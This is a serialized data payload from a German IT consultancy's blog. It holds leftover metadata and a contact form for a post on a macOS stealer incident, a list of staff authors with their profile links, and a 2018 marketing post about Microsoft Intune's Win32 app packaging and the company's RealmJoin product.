Checks",{"href":2191,"text":2192},"#stage-2-reverse-engineering-the-helper-binary","Stage 2: Binary Analysis",{"href":2194,"text":2047},"#the-backdoor",{"href":2196,"text":2197},"#the-power-of-the-collective-shield-our-exclusive-shared-threat-intelligence-platform","Shared Threat Intelligence",{"noMargin":2181},{"quote":2181,"infos":2200},{"bgColor":2201,"headline":2202,"subline":2203,"level":41,"textStyling":2204,"flush":2205,"person":2206,"form":2212},"var(--color-blue-dark)","Get in touch","Want to know how our Shared Threat Intelligence Platform protects you from unknown malware variants before the industry even knows they exist? Let's talk.","text-light","justify-content-end",{"image":2207,"cloudinary":2181,"alt":2208,"name":2209,"quotee":2209,"quoteeTitle":2210,"quote":2211},"/people/people-jan-geisbauer-csoc.jpg","Portrait of Jan Geisbauer, Head of Security at glueckkanja","Jan Geisbauer","Head of Security","The dangerous thing about this variant wasn't the technical complexity, impressive as it is. The dangerous thing was the time window. Without Shared Threat Intelligence, our other customers would have been exposed for hours while we were still analyzing.",{"ctaText":2213,"cta":2214,"method":2169,"action":2216,"fields":2217},"Submit",{"skin":2215},"primary is-light","/en/successful",[2218,2222,2226,2230,2235,2240,2243,2246,2249,2252,2254],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},"Name*","name","Please enter your name.",{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},"Company*","company","Please enter your company.",{"label":2227,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},"Email address*","email","Please enter your email address.",{"label":2231,"type":2232,"id":2233,"required":2168,"requiredMsg":2234},"Your message","textarea","message","Please enter a message.",{"label":2236,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},"Your data will be stored with us for the purpose of processing and responding to your inquiry. For more information on data protection, please refer to our \u003Ca href=\"/en/privacy\">Privacy Policy\u003C/a>.","checkbox","dataprotection","Please confirm",{"type":2241,"id":2242,"value":2176},"hidden","_topic",{"type":2241,"id":2244,"value":2245},"_location","World",{"type":2241,"id":2247,"value":2248},"_subject","Form: Blog AMOS Stealer CSOC | EN",{"type":2241,"id":2250,"value":2251},"inbox_key","gkgab-contact-form",{"type":2241,"id":2253},"_gotcha",{"type":2241,"id":2255},"jsonData",[2257,2259,2262],{"lang":2171,"href":2258},"/en/posts/2026-04-10-incident-to-intelligence",{"lang":2260,"href":2261},"de","/de/posts/2026-04-10-incident-to-intelligence",{"lang":2263,"href":2264},"es","/es/posts/2026-04-10-incident-to-intelligence","/posts/2026-04-10-incident-to-intelligence",{"title":5,"description":14},"posts/2026-04-10-incident-to-intelligence",[2269,2270,2271,2272,2273],"Threat Intelligence","Incident Response","macOS Security","Malware Analysis","Cyber Security Operations Center","YhxjTaEaYLnON_zSnfg76XiU9FORX3bvv7Ydt5bo5AU",{"id":2276,"extension":2277,"meta":2278,"stem":2612,"__hash__":2613},"authors_data/authors.json","json",{"path":2279,"Alexander Schlindwein":2280,"Sophie Luna":2286,"Nadine Kern":2294,"Karsten Kleinschmidt":2301,"Julian Wendt":2307,"Holger Bunkradt":2312,"Ralf Mania":2318,"Oliver Kieselbach":2324,"Steffen Schwerdtfeger":2330,"Gunnar Winter":2338,"Jan Petersen":2343,"Thorsten Kunzi":2348,"Moritz Pohl":2352,"Thorben Pöschus":2357,"Christoph Hannebauer":2363,"Marco Scheel":2367,"Christopher Brumm":2372,"Florian Klante":2379,"Niklas Bachmann":2384,"Nils Krautkrämer":2389,"Patrick Treptau":2395,"Peter Beckendorf":2400,"Patrick Sobau":2405,"Jörg Wunderlich":2410,"Michael Breither":2414,"Christian Kanja":2419,"Zeba Hoffmann":2425,"Jochen Fröhlich":2430,"Jan Geisbauer":2434,"Gerrit Reinke":2445,"Christian Kordel":2451,"Stephan Wälde":2455,"Carolin Kanja":2460,"Adrian Ritter":2466,"Marvin Bangert":2471,"Thorsten Pickhan":2477,"Christian Lorenz":2483,"Denis Böhm":2488,"Fabian Bader":2493,"Juan Jose Fernandez Perez":2499,"Mahschid Sayyar":2504,"Benjamin Dassow":2509,"Markus Walschburger":2514,"Jonathan Haist":2519,"Daniel Rohregger":2524,"Thomas Naunheim":2529,"Florian Stöckl":2534,"Pascal Asch":2539,"Markus Kättner":2543,"Anna Ulbricht":2550,"body":2557,"title":2611,"Thorben Poeschus":2357,"Nils Krautkraemer":2389,"Joerg Wunderlich":2410,"Jochen Froehlich":2430,"Stephan Waelde":2455,"Denis Boehm":2488,"Florian Stoeckl":2534,"Markus Kaettner":2543},"/authors",{"display_name":2281,"avatar":2282,"permalink":2283,"twitter":2284,"linkedin":2285},"Alexander Schlindwein","people/people-alexander-rudolph.png","/authors/alexander-schlindwein","AlexanderOnIT","schlindwein-alexander",{"display_name":2287,"avatar":2288,"permalink":2289,"twitter":2290,"linkedin":2291,"imageOffsetLeft":2292,"imageOffsetTop":2293},"Sophie Luna","c_thumb,h_1600,w_1600/people/people-sophie-luna.jpg","/authors/sophie-luna","glueckkanjagab","../company/glueckkanja-gab","58%","67%",{"display_name":2295,"avatar":2296,"permalink":2297,"twitter":2298,"linkedin":2299,"imageOffsetTop":2300},"Nadine Kern","people/people-nadine-kern.png","/authors/nadine-kern","nadineausRT","nadine-kern","72%",{"display_name":2302,"avatar":2303,"permalink":2304,"twitter":2305,"linkedin":2306},"Karsten Kleinschmidt","people/people-karsten-kleinschmidt.png","/authors/karsten-kleinschmidt","KarstenonIT","karstenkleinschmidt",{"display_name":2308,"avatar":2309,"permalink":2310,"linkedin":2311},"Julian Wendt","people/people-julian-wendt.png","/authors/julian-wendt","julian-wendt",{"display_name":2313,"avatar":2314,"permalink":2315,"linkedin":2316,"twitter":2317},"Holger Bunkradt","people/people-holger-bunkradt.png","/authors/holger-bunkradt","holger-bunkradt-12b5053b","hbunkradt",{"display_name":2319,"avatar":2320,"permalink":2321,"linkedin":2322,"twitter":2323},"Ralf Mania","people/people-ralf-mania.png","/authors/ralf-mania","ralf-mania-146a2757","RaMa1976",{"display_name":2325,"avatar":2326,"permalink":2327,"linkedin":2328,"twitter":2329},"Oliver Kieselbach","people/people-oliver-kieselbach.png","/authors/oliver-kieselbach","oliver-kieselbach-a4a3409","okieselbT",{"display_name":2331,"avatar":2332,"permalink":2333,"linkedin":2334,"twitter":2335,"imageOffsetTop":2336,"imageOffsetLeft":2337},"Steffen Schwerdtfeger","people/people-steffen-schwerdtfeger.png","/authors/steffen-schwerdtfeger","steffen-schwerdtfeger","SteffenAtCloud","79%","51%",{"display_name":2339,"avatar":2340,"permalink":2341,"twitter":2290,"linkedin":2342},"Gunnar Winter","c_thumb,h_1600,w_1600/people/people-gunnar-winter.jpg","/authors/gunnar-winter","company/glueckkanja-gab",{"display_name":2344,"avatar":2345,"permalink":2346,"twitter":2290,"linkedin":2347},"Jan Petersen","c_thumb,h_1600,w_1600/people/jan-petersen.png","/authors/jan-petersen","jan-petersen-26a901",{"display_name":2349,"avatar":2350,"permalink":2351,"twitter":2290,"linkedin":2342,"imageOffsetTop":2300},"Thorsten Kunzi","c_thumb,h_1600,w_1600/people/author-thorsten-kunzi.png","/authors/thorsten-kunzi",{"display_name":2353,"avatar":2354,"permalink":2355,"twitter":2290,"linkedin":2356},"Dr. Moritz Pohl","c_thumb,h_1600,w_1600/people/people-moritz-pohl.png","/authors/moritz-pohl","dr-moritz-pohl",{"display_name":2358,"avatar":2359,"permalink":2360,"twitter":2361,"linkedin":2362},"Thorben Pöschus","c_thumb,h_1600,w_1600/people/thorben.poeschus.png","/authors/thorben-poeschus","TPO901","thorben-pöschus-624693b7",{"display_name":2364,"avatar":2365,"permalink":2366,"twitter":2290,"linkedin":2342,"imageOffsetTop":2300},"Dr. Christoph Hannebauer","people/people-christoph-hannebauer.png","/authors/christoph-hannebauer",{"display_name":2368,"avatar":2369,"permalink":2370,"twitter":2371,"linkedin":2371},"Marco Scheel","c_thumb,h_1600,w_1600/people/people-marco-scheel.png","/authors/marco-scheel","marcoscheel",{"display_name":2373,"avatar":2374,"permalink":2375,"twitter":2376,"linkedin":2377,"imageOffsetTop":2378},"Christopher Brumm","c_thumb,h_1600,w_1600/people/people-christopher-brumm.jpg","/authors/christopher-brumm","cbrhh","christopherbrumm","66%",{"display_name":2380,"avatar":2381,"permalink":2382,"linkedin":2383,"twitter":2290},"Florian Klante","c_thumb,h_1600,w_1600/people/florian-klante.jpg","/authors/florian-klante","florian-klante-6031b31b",{"display_name":2385,"avatar":2386,"permalink":2387,"linkedin":2388,"twitter":2290},"Niklas Bachmann","c_thumb,h_1600,w_1600/people/niklas.bachmann.png","/authors/niklas-bachmann","niklas-bachmann-66a863158",{"display_name":2390,"avatar":2391,"permalink":2392,"twitter":2393,"linkedin":2394},"Nils Krautkrämer","c_thumb,h_1600,w_1600/people/nils-krautkraemer.png","/authors/nils-krautkraemer","KrauNils","nils-krautkrämer-8b04bb250",{"display_name":2396,"avatar":2397,"permalink":2398,"linkedin":2399,"twitter":2290},"Patrick Treptau","c_thumb,h_1600,w_1600/people/people-patrick-treptau.png","/authors/patrick-traptau","ptreptau",{"display_name":2401,"avatar":2402,"permalink":2403,"linkedin":2404,"twitter":2290,"imageOffsetTop":2300},"Peter Beckendorf","c_thumb,h_1600,w_1600/people/peter-beckendorf.png","/authors/peter-beckendorf","peter-beckendorf-29a239b1",{"display_name":2406,"avatar":2407,"permalink":2408,"linkedin":2409,"twitter":2290},"Patrick Sobau","c_thumb,h_1600,w_1600/people/patrick-sobau.png","/authors/patrick-sobau","patrick-sobau",{"display_name":2411,"avatar":2412,"permalink":2413,"twitter":2290},"Jörg Wunderlich","c_thumb,h_1600,w_1600/people/joerg-wunderlich.png","/authors/joerg-wunderlich",{"display_name":2415,"avatar":2416,"permalink":2417,"twitter":2290,"linkedin":2418},"Michael Breither","c_thumb,h_1600,w_1600/people/people-michael-breither.jpg","/authors/michael-breither","michaelbreither",{"display_name":2420,"avatar":2421,"permalink":2422,"twitter":2423,"linkedin":2424},"Christian Kanja","c_thumb,h_1600,w_1600/people/people-christian-kanja.png","/authors/christian-kanja","cekageka","christian-kanja",{"display_name":2426,"avatar":2427,"permalink":2428,"linkedin":2429,"twitter":2290},"Zeba Hoffmann","c_thumb,h_1600,w_1600/people/zeba-hoffmann.png","/authors/zeba-hoffmann","zebahoffmann",{"display_name":2431,"avatar":2432,"permalink":2433,"twitter":2290,"linkedin":2342},"Jochen Fröhlich","c_thumb,h_1600,w_1600/people/people-jochen-froehlich.png","/authors/jochen-froehlich",{"display_name":2209,"avatar":2435,"permalink":2436,"twitter":2437,"linkedin":2437,"imageOffsetTop":2300,"socials":2438},"c_thumb,h_1600,w_1600/people/people-jan-geisbauer-csoc.png","/authors/jan-geisbauer","JanGeisbauer",[2439,2442],{"text":2440,"href":2441},"Blog","https://emptydc.com",{"text":2443,"href":2444},"Podcast","https://hairlessinthecloud.com",{"display_name":2446,"avatar":2447,"permalink":2448,"twitter":2449,"linkedin":2450},"Gerrit Reinke","c_thumb,h_1600,w_1600/people/gerrit-reinke.png","/authors/gerrit-reinke","GLWRe","glwr",{"display_name":2452,"avatar":2453,"permalink":2454,"twitter":2290,"linkedin":2342},"Christian Kordel","c_thumb,h_1600,w_1600/people/christian-kordel.png","/authors/christian-kordel",{"display_name":2456,"avatar":2457,"permalink":2458,"twitter":2459,"linkedin":2342},"Stephan Wälde","c_thumb,h_1600,w_1600/people/people-stephan-waelde.png","/authors/stephan-waelde","stephanwaelde",{"display_name":2461,"avatar":2462,"permalink":2463,"twitter":2464,"linkedin":2465},"Carolin Kanja","c_thumb,h_1600,w_1600/people/people-carolin-kanja.jpg","/authors/carolin-kanja","fraukanja","carolin-kanja",{"display_name":2467,"avatar":2468,"permalink":2469,"twitter":2470,"linkedin":2470},"Adrian Ritter","c_thumb,h_1600,w_1600/people/people-adrian-ritter.png","/authors/adrian-ritter","adrianritter",{"display_name":2472,"avatar":2473,"permalink":2474,"twitter":2475,"linkedin":2476},"Marvin Bangert","c_thumb,h_1600,w_1600/people/people-marvin-bangert.png","/authors/marvin-bangert","marvinbangert","marvin-bangert",{"display_name":2478,"avatar":2479,"permalink":2480,"twitter":2481,"linkedin":2482},"Thorsten Pickhan","c_thumb,h_1600,w_1600/people/people-thorsten-pickhan.png","/authors/thorsten-pickhan","tpickhan","thorsten-pickhan",{"display_name":2484,"avatar":2485,"permalink":2486,"linkedin":2487,"twitter":2290},"Christian Lorenz","c_thumb,h_1600,w_1600/people/people-christian-lorenz.png","/authors/christian-lorenz","christianlorenz95",{"display_name":2489,"avatar":2490,"permalink":2491,"linkedin":2492,"twitter":2290},"Denis Böhm","c_thumb,h_1600,w_1600/people/people-denis-boehm.png","/authors/denis-boehm","denis-böhm-3bb834135",{"display_name":2494,"avatar":2495,"permalink":2496,"linkedin":2497,"twitter":2498},"Fabian Bader","c_thumb,h_1600,w_1600/people/people-fabian-bader.jpg","/authors/fabian-bader","fabianbader","fabian_bader",{"display_name":2500,"avatar":2501,"permalink":2502,"linkedin":2503},"Juan Jose Fernandez Perez","c_thumb,h_1600,w_1600/people/people-juan-jose-fernandez.jpg","/authors/juan-jose-fernandez-perez","juan-jose-fernandez-perez-8016055",{"display_name":2505,"avatar":2506,"permalink":2507,"linkedin":2508},"Mahschid Sayyar","c_thumb,h_1600,w_1600/people/people-mahschid-sayyar.jpg","/authors/mahschid-sayyar","mahschid-sayyar-97544463",{"display_name":2510,"avatar":2511,"permalink":2512,"linkedin":2513},"Benjamin Dassow","c_thumb,h_1600,w_1600/people/people-benjamin-dassow.jpg","/authors/benjamin-dassow","benjamin-dassow",{"display_name":2515,"avatar":2516,"permalink":2517,"linkedin":2518},"Markus Walschburger","c_thumb,h_1600,w_1600/people/people-markus-walschburger.jpg","/authors/markus-walschburger","markus-walschburger",{"display_name":2520,"avatar":2521,"permalink":2522,"linkedin":2523,"imageOffsetTop":2300},"Jonathan Haist","c_thumb,h_1600,w_1600/people/people-jonathan-haist.jpg","/authors/jonathan-haist","jonathanhaist",{"display_name":2525,"avatar":2526,"permalink":2527,"linkedin":2528,"imageOffsetTop":2300},"Daniel Rohregger","c_thumb,h_1600,w_1600/people/people-daniel-rohregger.jpg","/authors/daniel-rohregger","drohregger",{"display_name":2530,"avatar":2531,"permalink":2532,"linkedin":2533,"imageOffsetTop":2378},"Thomas Naunheim","c_thumb,h_1600,w_1600/people/people-thomas-naunheim.jpg","/authors/thomas-naunheim","thomasnaunheim",{"display_name":2535,"avatar":2536,"permalink":2537,"linkedin":2538,"imageOffsetTop":2378},"Florian Stöckl","c_thumb,h_1600,w_1600/people/people-florian-stoeckl.jpg","/authors/florian-stoeckl","florianstoeckl",{"display_name":7,"avatar":2540,"permalink":2541,"linkedin":2542,"imageOffsetTop":2378},"c_thumb,h_1600,w_1600/people/Pascal.Asch.648.jpg","/authors/pascal-asch","pascal-asch",{"display_name":2544,"avatar":2545,"permalink":2546,"linkedin":2547,"imageOffsetTop":2548,"imageOffsetLeft":2549},"Markus Kättner","c_thumb,h_1600,w_1600/people/markus-kaettner.jpg","/authors/markus-kaettner","markus-kättner-b600119","62%","63%",{"display_name":2551,"avatar":2552,"permalink":2553,"linkedin":2554,"imageOffsetTop":2555,"imageOffsetLeft":2556},"Anna Ulbricht","c_thumb,h_1600,w_1600/people/anna-katharina.ulbricht-09.png","/authors/anna-ulbricht","anna-katharina-u-a67702199","70%","50%",{"Alexander Schlindwein":2558,"Sophie Luna":2559,"Nadine Kern":2560,"Karsten Kleinschmidt":2561,"Julian Wendt":2562,"Holger Bunkradt":2563,"Ralf Mania":2564,"Oliver Kieselbach":2565,"Steffen Schwerdtfeger":2566,"Gunnar Winter":2567,"Jan Petersen":2568,"Thorsten Kunzi":2569,"Moritz Pohl":2570,"Thorben Pöschus":2571,"Christoph Hannebauer":2572,"Marco Scheel":2573,"Christopher Brumm":2574,"Florian Klante":2575,"Niklas Bachmann":2576,"Nils Krautkrämer":2577,"Patrick Treptau":2578,"Peter Beckendorf":2579,"Patrick Sobau":2580,"Jörg Wunderlich":2581,"Michael Breither":2582,"Christian Kanja":2583,"Zeba Hoffmann":2584,"Jochen Fröhlich":2585,"Jan Geisbauer":2586,"Gerrit Reinke":2590,"Christian Kordel":2591,"Stephan Wälde":2592,"Carolin Kanja":2593,"Adrian Ritter":2594,"Marvin Bangert":2595,"Thorsten Pickhan":2596,"Christian Lorenz":2597,"Denis Böhm":2598,"Fabian Bader":2599,"Juan Jose Fernandez Perez":2600,"Mahschid Sayyar":2601,"Benjamin Dassow":2602,"Markus Walschburger":2603,"Jonathan Haist":2604,"Daniel Rohregger":2605,"Thomas Naunheim":2606,"Florian Stöckl":2607,"Pascal Asch":2608,"Markus Kättner":2609,"Anna Ulbricht":2610},{"display_name":2281,"avatar":2282,"permalink":2283,"twitter":2284,"linkedin":2285},{"display_name":2287,"avatar":2288,"permalink":2289,"twitter":2290,"linkedin":2291,"imageOffsetLeft":2292,"imageOffsetTop":2293},{"display_name":2295,"avatar":2296,"permalink":2297,"twitter":2298,"linkedin":2299,"imageOffsetTop":2300},{"display_name":2302,"avatar":2303,"permalink":2304,"twitter":2305,"linkedin":2306},{"display_name":2308,"avatar":2309,"permalink":2310,"linkedin":2311},{"display_name":2313,"avatar":2314,"permalink":2315,"linkedin":2316,"twitter":2317},{"display_name":2319,"avatar":2320,"permalink":2321,"linkedin":2322,"twitter":2323},{"display_name":2325,"avatar":2326,"permalink":2327,"linkedin":2328,"twitter":2329},{"display_name":2331,"avatar":2332,"permalink":2333,"linkedin":2334,"twitter":2335,"imageOffsetTop":2336,"imageOffsetLeft":2337},{"display_name":2339,"avatar":2340,"permalink":2341,"twitter":2290,"linkedin":2342},{"display_name":2344,"avatar":2345,"permalink":2346,"twitter":2290,"linkedin":2347},{"display_name":2349,"avatar":2350,"permalink":2351,"twitter":2290,"linkedin":2342,"imageOffsetTop":2300},{"display_name":2353,"avatar":2354,"permalink":2355,"twitter":2290,"linkedin":2356},{"display_name":2358,"avatar":2359,"permalink":2360,"twitter":2361,"linkedin":2362},{"display_name":2364,"avatar":2365,"permalink":2366,"twitter":2290,"linkedin":2342,"imageOffsetTop":2300},{"display_name":2368,"avatar":2369,"permalink":2370,"twitter":2371,"linkedin":2371},{"display_name":2373,"avatar":2374,"permalink":2375,"twitter":2376,"linkedin":2377,"imageOffsetTop":2378},{"display_name":2380,"avatar":2381,"permalink":2382,"linkedin":2383,"twitter":2290},{"display_name":2385,"avatar":2386,"permalink":2387,"linkedin":2388,"twitter":2290},{"display_name":2390,"avatar":2391,"permalink":2392,"twitter":2393,"linkedin":2394},{"display_name":2396,"avatar":2397,"permalink":2398,"linkedin":2399,"twitter":2290},{"display_name":2401,"avatar":2402,"permalink":2403,"linkedin":2404,"twitter":2290,"imageOffsetTop":2300},{"display_name":2406,"avatar":2407,"permalink":2408,"linkedin":2409,"twitter":2290},{"display_name":2411,"avatar":2412,"permalink":2413,"twitter":2290},{"display_name":2415,"avatar":2416,"permalink":2417,"twitter":2290,"linkedin":2418},{"display_name":2420,"avatar":2421,"permalink":2422,"twitter":2423,"linkedin":2424},{"display_name":2426,"avatar":2427,"permalink":2428,"linkedin":2429,"twitter":2290},{"display_name":2431,"avatar":2432,"permalink":2433,"twitter":2290,"linkedin":2342},{"display_name":2209,"avatar":2435,"permalink":2436,"twitter":2437,"linkedin":2437,"imageOffsetTop":2300,"socials":2587},[2588,2589],{"text":2440,"href":2441},{"text":2443,"href":2444},{"display_name":2446,"avatar":2447,"permalink":2448,"twitter":2449,"linkedin":2450},{"display_name":2452,"avatar":2453,"permalink":2454,"twitter":2290,"linkedin":2342},{"display_name":2456,"avatar":2457,"permalink":2458,"twitter":2459,"linkedin":2342},{"display_name":2461,"avatar":2462,"permalink":2463,"twitter":2464,"linkedin":2465},{"display_name":2467,"avatar":2468,"permalink":2469,"twitter":2470,"linkedin":2470},{"display_name":2472,"avatar":2473,"permalink":2474,"twitter":2475,"linkedin":2476},{"display_name":2478,"avatar":2479,"permalink":2480,"twitter":2481,"linkedin":2482},{"display_name":2484,"avatar":2485,"permalink":2486,"linkedin":2487,"twitter":2290},{"display_name":2489,"avatar":2490,"permalink":2491,"linkedin":2492,"twitter":2290},{"display_name":2494,"avatar":2495,"permalink":2496,"linkedin":2497,"twitter":2498},{"display_name":2500,"avatar":2501,"permalink":2502,"linkedin":2503},{"display_name":2505,"avatar":2506,"permalink":2507,"linkedin":2508},{"display_name":2510,"avatar":2511,"permalink":2512,"linkedin":2513},{"display_name":2515,"avatar":2516,"permalink":2517,"linkedin":2518},{"display_name":2520,"avatar":2521,"permalink":2522,"linkedin":2523,"imageOffsetTop":2300},{"display_name":2525,"avatar":2526,"permalink":2527,"linkedin":2528,"imageOffsetTop":2300},{"display_name":2530,"avatar":2531,"permalink":2532,"linkedin":2533,"imageOffsetTop":2378},{"display_name":2535,"avatar":2536,"permalink":2537,"linkedin":2538,"imageOffsetTop":2378},{"display_name":7,"avatar":2540,"permalink":2541,"linkedin":2542,"imageOffsetTop":2378},{"display_name":2544,"avatar":2545,"permalink":2546,"linkedin":2547,"imageOffsetTop":2548,"imageOffsetLeft":2549},{"display_name":2551,"avatar":2552,"permalink":2553,"linkedin":2554,"imageOffsetTop":2555,"imageOffsetLeft":2556},"Authors","authors","Qkbr0Ywae26Kxloa5JhqFSd0eMg8Ccs9DhjH7FyMzvY",[2615,2829,2977,3002,3092,3133,3190,3399,3535,3663,3737,3807,3845,4031,4161,4247,4321,4403,4492,4848,4899,4954,5016,5072,5115,5302,5514,5622,5728,5831,5897,5962,6039,6215,6374,6708,7008,7664,7777,7907,7982,8137,8249,20678,20890,21030,21793,22044,22198,22366,22497,22620,23440,24133,24196,24505,24735],{"id":2616,"title":2617,"author":2420,"body":2618,"cta":2166,"description":2807,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":2808,"moment":2819,"navigation":2181,"path":2820,"seo":2821,"stem":2822,"tags":2823,"webcast":2168,"__hash__":2828},"content_en/posts/2018-09-25-intunewin.md","Intune Package Store",{"type":9,"value":2619,"toc":2801},[2620,2639,2646,2650,2661,2664,2683,2687,2700,2706,2717,2721,2731,2736,2747,2752,2755,2758,2777,2781],[12,2621,2622,2623,2626,2627,2630,2631,2634,2635,2638],{},"On Monday, September 24, at Ignite in Orlando, Microsoft announced the new ",[251,2624,2625],{},"Intune Win32 App-Packaging"," technology (also named ",[251,2628,2629],{},"intunewin","). Due to our strong relationship with the Intune product group our ",[251,2632,2633],{},"RealmJoin ecosystem"," is already completely adopted to this new format. That means that the new Intune technology is available to deploy ",[251,2636,2637],{},"hundreds of ready-to-use"," Windows application packages from the start. A cloud based package factory is ready to create any custom package request within hours to help customers to deploy 100% cloud managed workplaces - today.",[12,2640,2641],{},[2642,2643],"img",{"alt":2644,"src":2645},"RealmJoin at Ignite Intune Session","https://res.cloudinary.com/c4a8/image/upload/blog/pics/intune-ignite-glueckkanja.png",[186,2647,2649],{"id":2648},"background","Background",[12,2651,2652,2653,2656,2657,2660],{},"When the global logistics company ",[251,2654,2655],{},"DB Schenker"," with 60,000 users in more than 1,000 branches needed a modern workplace strategy the idea was born to design a future workplace not only consuming cloud services but living a cloud operated client without any local dependencies. Instead of consolidating over 350 Active Directories, their trusted partner and Microsoft awarded ",[251,2658,2659],{},"Partner of the Year Glück & Kanja"," designed a solution to deploy a large-scale Azure AD together with Microsoft Intune provisioned Windows 10. This enables the customer to deploy secure corporate clients everywhere - no matter if the user works from headquarters or the local Starbucks.",[12,2662,2663],{},"{% youtube ABUieErMHLU %}",[12,2665,2666,2667,2670,2671,2678,2679,2682],{},"Based on this experience, a blueprint was created to help other enterprise companies like ",[251,2668,2669],{},"EnBW, Uniper,"," and many more, deploy 100% cloud managed clients. The only real problem was that the deployment of Win32 applications were not possible at this time with native Intune. Glück & Kanja therefore developed a bridge technology called ",[2672,2673,2677],"a",{"href":2674,"rel":2675},"https://realmjoin.com",[2676],"nofollow","RealmJoin"," that closed the gap and worked as a companion to Intune to deploy thousands of different Windows applications from Adobe to SAP. Part of this ecosystem was a full-blown cloud based application store with ",[251,2680,2681],{},"pre-packaged Win32 applications"," to fast start any new project with predictable time and budget.",[186,2684,2686],{"id":2685},"the-technology","The Technology",[12,2688,2689,2690,2693,2694,2699],{},"Glück & Kanja designed a ",[251,2691,2692],{},"package factory"," based on modern development best practices. Instead of another incarnation of heavy loaded and aged SCCM or similar package formats and creation processes, the lightweight approach was to create a combination of binaries, metadata, and intelligence, into a well known package format called ",[2672,2695,2698],{"href":2696,"rel":2697},"https://www.nuget.org",[2676],"NuGet",". These packages are used by millions of developers every day and is proven in countless instances. NuGet are created in a version control system (git) offering a reliable auditing about what, when, and who has changed anything in the lifetime of a package. When a change is committed an Azure driven automation builds the packages within deterministic environments (CI/CD system) and automated tests are done before a package is published to get tested by human delivery experts or key users. Finally, the preview packages are released to production to be deployed on thousands of devices.",[12,2701,2702],{},[2642,2703],{"alt":2704,"src":2705},"RealmJoin Portal","https://res.cloudinary.com/c4a8/image/upload/blog/pics/realmjoin-app-portal.png",[12,2707,2708,2709,2712,2713,2716],{},"When working with the ",[251,2710,2711],{},"Intune product group"," and their design of a modern packaging system for Win32 applications, it was obvious that their package format was nearly identical to the approach we have used for the last two years. And because of the automation system we’ve designed to create packages, we did not need to change anything in the sources but instead transformed the automation code to create the ",[251,2714,2715],{},"new .intunewin package format",". We publish the packages directly into the Intune backend by using a pre-release of the Microsoft Graph API for Intune.This made it possible to offer hundreds of ready-to-deploy packages to a diverse customer audience that are interested in removing the barriers of an on-premise bound deployment, in favor of a 100% cloud managed Windows 10 experience.",[186,2718,2720],{"id":2719},"the-product","The Product",[12,2722,2723,2726,2727,2730],{},[2672,2724,2677],{"href":2674,"rel":2725},[2676]," is an enterprise ready SaaS infrastructure that supports AutoPilot, Azure AD, and Intune based Windows deployments, with the necessary companion technology to complete the cloud management picture of modern workplace deployments. While Intune was already great in managing lots of aspects in these scenarios a bunch of missing pieces like seamless Bitlocker rollout, asset and license inventory, legacy identity headaches, and most important the deployment of Win32 applications, was not ready for large scale deployments. RealmJoin solves these issues with an ",[251,2728,2729],{},"AzureAD/Intune integrated combination"," of a cloud based, multi-tenant operations backend, a lightweight client agent, and a package factory with a peer2peer-enabled CDN. Also, the package management allows application installation on thousands of machines worldwide with moderate bandwidth by using peer caching and offering all necessary extras like dependencies, staggered deployments, and managing the compliance state of devices.",[12,2732,2733],{},[2642,2734],{"alt":2704,"src":2735},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/realmjoin-user-portal.png",[12,2737,2738,2739,2742,2743,2746],{},"With the release of the new Intune package format in October, the ",[251,2740,2741],{},"RealmJoin SaaS"," solution will offer the same companion features to the native Intune deployment ecosystem. A modern workplace deployment will be possible with no on-premise dependency by using the AzureAD and Intune in combination with the RealmJoin offered Intune packages. But this journey will not end by deploying the software - the whole lifecycle is ",[251,2744,2745],{},"cloud managed"," in an intuitive web portal with full insights about the health and state of all systems and easy assignment of software to AzureAD groups within one dashboard. This is also a great approach to separate the levels of administration, and gives first and second level support with the tools they need without the learning curve of a full blown Azure portal.",[12,2748,2749],{},[2642,2750],{"alt":2704,"src":2751},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/realmjoin-device-portal.png",[12,2753,2754],{},"The RealmJoin App Store for Microsoft Intune helps to fast start any new project with predictable time and budget.\nBut not only the pre-packaged applications are available for a fixed price. Also the Packaging-as-a-Service offering\nwe provide for all modern workplace projects is a fixed price per package agreement to make your Windows 10 migration\na safe and predictable project.",[12,2756,2757],{},"Along with the RealmJoin App Store, there are a few other products worth mentioning.",[12,2759,2760,2761,2764,2765,2770,2771,2776],{},"The migration to Windows 10 is well supported by great Microsoft Offerings, like Windows Analytics. However, when theory meets reality there are always some road-blockers. One issue we currently see is around documents and particularly ",[251,2762,2763],{},"PST files"," on local disks. ",[2672,2766,2769],{"href":2767,"rel":2768},"https://realmigrator.com",[2676],"RealMigrator"," is another SaaS product that helps to get the local data safely and silently migrated. And with ",[2672,2772,2775],{"href":2773,"rel":2774},"https://konnekt.io",[2676],"Konnekt"," we provide for Citrix and the Virtual Desktop world, one can integrate OneDrive OnDemand and SharePoint/Office 365 group access without the headaches of massively synced data.",[186,2778,2780],{"id":2779},"next-steps","Next Steps",[12,2782,2783,2784,2788,2789,2794,2795,2800],{},"If you’re interested in the cloud approach of modern workplaces, we are happy to get ",[2672,2785,2787],{"href":2786},"mailto:info@realmjoin.com","in contact"," with you. We've also provided a Website ",[2672,2790,2793],{"href":2791,"rel":2792},"https://intunewin.com",[2676],"intunewin.com"," and tweet at ",[2672,2796,2799],{"href":2797,"rel":2798},"https://twitter.com/intunewin",[2676],"@intunewin"," to consolidate all information about the new Intune Win32 application deployment capabilities.",{"title":65,"searchDepth":111,"depth":111,"links":2802},[2803,2804,2805,2806],{"id":2648,"depth":329,"text":2649},{"id":2685,"depth":329,"text":2686},{"id":2719,"depth":329,"text":2720},{"id":2779,"depth":329,"text":2780},"On Monday, September 24, at Ignite in Orlando, Microsoft announced the new Intune Win32 App-Packaging technology (also named intunewin). Due to our strong relationship with the Intune product group our RealmJoin ecosystem is already completely adopted to this new format. That means that the new Intune technology is available to deploy hundreds of ready-to-use Windows application packages from the start. A cloud based package factory is ready to create any custom package request within hours to help customers to deploy 100% cloud managed workplaces - today.",{"lang":2171,"categories":2809,"blogtitlepic":2811,"thumb":2812,"socialimg":2813,"customExcerpt":2814,"hreflang":2815,"scripts":2818},[2810],"Workplace","head-intunewin","thumb-intunewin","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-intunewin.jpg","On Monday, September 24, at Ignite in Orlando, Microsoft announced the new Intune Win32 App-Packaging technology (also named intunewin). Due to our strong relationship with the Intune product group our RealmJoin 